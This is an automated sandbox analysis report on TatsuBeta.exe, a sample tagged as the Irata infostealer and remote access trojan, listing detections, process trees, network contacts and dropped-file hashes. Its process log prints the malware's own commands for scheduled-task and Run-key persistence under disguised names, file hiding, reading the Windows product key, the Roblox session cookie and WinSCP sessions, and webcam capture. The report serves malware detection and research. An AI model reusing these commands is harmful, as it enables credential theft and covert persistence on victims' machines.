Malware Analysis Report

2025-01-19 06:30

Sample ID 231217-q3yrcaefar
Target TatsuBeta.exe
SHA256 15bb700544c589dba519ae5692062b766d9eced9ed7f6fabc3c44acd686ec2cc
Tags
irata infostealer rat trojan persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

15bb700544c589dba519ae5692062b766d9eced9ed7f6fabc3c44acd686ec2cc

Threat Level: Known bad

The file TatsuBeta.exe was found to be: Known bad.

Malicious Activity Summary

irata infostealer rat trojan persistence spyware stealer

Irata

Irata payload

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Drops startup file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Collects information from the system

Uses Task Scheduler COM API

Runs net.exe

Views/modifies file attributes

Creates scheduled task(s)

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-17 13:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win10-20231215-en

Max time kernel

14s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1400 --field-trial-handle=1644,14407859998031078421,17795621673872728378,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1316 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1316 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1844 --field-trial-handle=1644,14407859998031078421,17795621673872728378,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1316 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1316 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupf0lYcR /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupf0lYcR /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupf0lYcR /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupf0lYcR /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupf0lYcR /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\rpOvdtmrqd9NSe2hijiB\System\cam.5080_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\rpOvdtmrqd9NSe2hijiB\System\cam.5080_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_f0lYcR.vbs\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_f0lYcR.vbs\""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_f0lYcR /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_f0lYcR.vbs /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_f0lYcR /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_f0lYcR.vbs /f"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_f0lYcR.vbs

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=792 --field-trial-handle=1644,14407859998031078421,17795621673872728378,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 store7.gofile.io udp
US 136.175.9.9:443 store7.gofile.io tcp
US 8.8.8.8:53 9.9.175.136.in-addr.arpa udp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp

Files

\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\d3dcompiler_47.dll

MD5 19bced7133bb95574748ea5bdf4a962d
SHA1 f04296c4781d5305c33759c6ab7e72ee08e3024f
SHA256 2baaf013427d7704750c2077694d10850ba53c1c42d8964adea7b0472a9b7088
SHA512 ab771cde97e2bb3795e17ebd8707d799701968e25ed31956e292a80a49646b48fe6e17eb50f54aa6f730e6a2641a05bd5e7f4e3de236072cd4ed5e1fe063bf08

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\ffmpeg.dll

MD5 fd9ed41a5b0bed0dd9d9ff7a6fc0d7ba
SHA1 c77fcec0e11bb61e70593f498eec3786677f5d71
SHA256 ac6572c3e4567e07df184aeee87d6172ccbd1c5dce14f87adc008d2f262a3bc4
SHA512 89eb8d7cd4fb4ccbaa3c5ce399d6d117849004fd946e10f8e7023ce6d98db4e721bbd503c61e4a976466330a34daec4911446e0d762477a1d11cda42b557030d

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\icudtl.dat

MD5 32aadc2acb3bb06ba25f3bb335ef47c8
SHA1 9f9e5e6c2a15fb399b8320961f834993c3fb77cd
SHA256 3b5dde9655eac094e108dc1b18242f53648a818a5d73c3ee507f0305e6d70d72
SHA512 77db45243dc6145751acaa384efe9389bfb2e20aa1dacebfe9d0b38586d0e95e47d2768a1a7c588535db83dfe2487677157617daedbb8a7f7700691118574244

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
